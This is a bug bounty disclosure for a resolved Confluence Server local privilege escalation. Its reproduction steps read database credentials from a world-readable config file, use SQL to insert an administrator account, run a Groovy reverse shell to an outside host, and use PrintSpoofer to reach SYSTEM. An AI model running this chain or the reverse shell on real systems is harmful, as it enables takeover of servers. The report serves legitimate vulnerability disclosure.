Local Privilege Escalation via Confluence Server

Disclosed by
matcluck
  • Engagement Atlassian
  • Disclosed date 5 months ago
  • Reward $800
  • Priority P3 Bugcrowd's VRT priority rating
  • Status Resolved This vulnerability has been accepted and fixed
Summary by Atlassian

Local Privilege Escalation Vulnerability in Confluence Server

Summary by matcluck

Confluence Data Center was vulnerable to local privilege escalation due to insecure permissions applied to a configuration file. An attacker with local file system access could exploit this to achieve NT AUTHORITY\SYSTEM access.

Report details

  • Submitted

  • Target Location

    Confluence Data Center

  • Target category

    Other

  • VRT

    Server Security Misconfiguration

  • Priority

    P3
  • Bug URL
    Empty
  • Description

    Overview

    With low privilege access (standard user access) to a Windows host running Confluence Server, it is possible to escalate privileges to Confluence administrator and NT AUTHORITY\SYSTEM by extracting secrets from confluence.cfg.xml (C:\Program Files\Atlassian\Application Data\Confluence\confluence.cfg.xml).

    An out of the box Confluence Server installation configures this file so that it is readable by all members of the local Users group (See Screenshot1.png))

    An adversary with a low privilege foothold on a Windows host running Confluence Server would be able to exploit this vulnerability to gain complete control of the server and Confluence data contained within.

    Reproduction Steps

    1. Extract the database credentials from the confluence.cfg file:
    C:\Users\lowpriv>whoami /groups

GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE               Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192

C:\Users\lowpriv>type "C:\Program Files\Atlassian\Application Data\Confluence\confluence.cfg.xml" | findstr /c:"hibernate.connection.username" /c:"hibernate.connection.password"
    <property name="hibernate.connection.password">confluence</property>
    <property name="hibernate.connection.username">postgres</property>
    1. Connect to the DBMS using extracted credentials
    C:\Program Files\PostgreSQL\16rc1\bin>psql -U postgres
Password for user postgres:
psql (16rc1)
WARNING: Console code page (437) differs from Windows code page (1252)
         8-bit characters might not work correctly. See psql reference
         page "Notes for Windows users" for details.
Type "help" for help.

postgres=# \c confluence
You are now connected to database "confluence" as user "postgres".
confluence=#
    1. Using SQL and the cwd tables, add a confluence user

    Note: {PKCS5S2}yLIYwNvu4mbhTXYF0ZE0CW/IKpG78xrakS1qlm1uuW0I506icmhxmIt+P2v5IDKu is the hashed value for admin

    confluence=# insert into cwd_user (id, user_name, lower_user_name, active, created_date, updated_date, last_name, lower_last_name, display_name, lower_display_name, email_address, lower_email_address, external_id, directory_id, credential) values (491523, 'bugcrowd', 'bugcrowd', 'T', '2023-09-12 19:46:07.587', '2023-09-12 19:46:07.587', 'bugcrowd', 'bugcrowd', 'bugcrowd', 'bugcrowd', 'ct.celliott@gmail.com', 'ct.celliott@gmail.com', '9d9c7244-e4ad-465b-91c5-dfeaad4c39c3',360449,'{PKCS5S2}yLIYwNvu4mbhTXYF0ZE0CW/IKpG78xrakS1qlm1uuW0I506icmhxmIt+P2v5IDKu');

confluence=# select id, user_name, credential from cwd_user;
   id   | user_name |                                credential
--------+-----------+---------------------------------------------------------------------------
 491521 | admin     | {PKCS5S2}yLIYwNvu4mbhTXYF0ZE0CW/IKpG78xrakS1qlm1uuW0I506icmhxmIt+P2v5IDKu
 491522 | hacker    | {PKCS5S2}yLIYwNvu4mbhTXYF0ZE0CW/IKpG78xrakS1qlm1uuW0I506icmhxmIt+P2v5IDKu
 491523 | bugcrowd  | {PKCS5S2}yLIYwNvu4mbhTXYF0ZE0CW/IKpG78xrakS1qlm1uuW0I506icmhxmIt+P2v5IDKu
    1. Add the user to the confluence-administrators and confluence-users groups:
    confluence=# select id, group_name from cwd_group;
   id   |        group_name
--------+---------------------------
 425985 | confluence-administrators
 425986 | confluence-users
(2 rows)


confluence=# insert into cwd_membership (id, parent_id, child_user_id) values (589829, 425986, 491523);
INSERT 0 1
confluence=# insert into cwd_membership (id, parent_id, child_user_id) values (589830, 425985, 491523);
INSERT 0 1
confluence=# select * from cwd_membership;
   id   | parent_id | child_group_id | child_user_id
--------+-----------+----------------+---------------
 589825 |    425986 |                |        491521
 589826 |    425985 |                |        491521
 589827 |    425986 |                |        491522
 589828 |    425985 |                |        491522
 589829 |    425986 |                |        491523
 589830 |    425985 |                |        491523
(6 rows)
    1. Add a user mapping entry for the user:
    confluence=# insert into user_mapping (user_key, username, lower_username) values ('4028db008a893503018a89379e250003', 'bugcrowd', 'bugcrowd');
INSERT 0 1
confluence=# select * from user_mapping;
             user_key             | username | lower_username
----------------------------------+----------+----------------
 4028db008a893503018a8935f3940000 | admin    | admin
 4028db008a893503018a89379e250001 | exporter | exporter
 4028db008a893503018a89379e250002 | hacker   | hacker
 4028db008a893503018a89379e250003 | bugcrowd | bugcrowd
(4 rows)

    1. Login to Confluence as the newly created admin (bugcrowd:admin) and observe that we have successfully achieved Confluence administrator level access (See Screenshot2.png)

    2. With admin access, it is possible to achieve command execution in the security context that the Confluence process is running as. For example, we can use the ScriptRunner plugin to execute a Groovy reverse shell (See Screenshot3.png):

    String host="192.168.1.142";
int port=1234;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
    1. With the ability to execute shell commands, we can observe that the confluence process security context has the SeImpersonatePrivilege privilege:
    [celliott@fedora ~]$ nc -lvp 1234
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.142.
Ncat: Connection from 192.168.1.142:58735.
Microsoft Windows [Version 10.0.19045.2965]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files\Atlassian\Confluence>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
    1. We can use this privilege to impersonate a SYSTEM token. For example, impersonating the Print Spooler service is a viable option on modern Windows.
    C:\temp>PrintSpoofer64.exe -i -c powershell.exe
PrintSpoofer64.exe -i -c powershell.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32>
Activity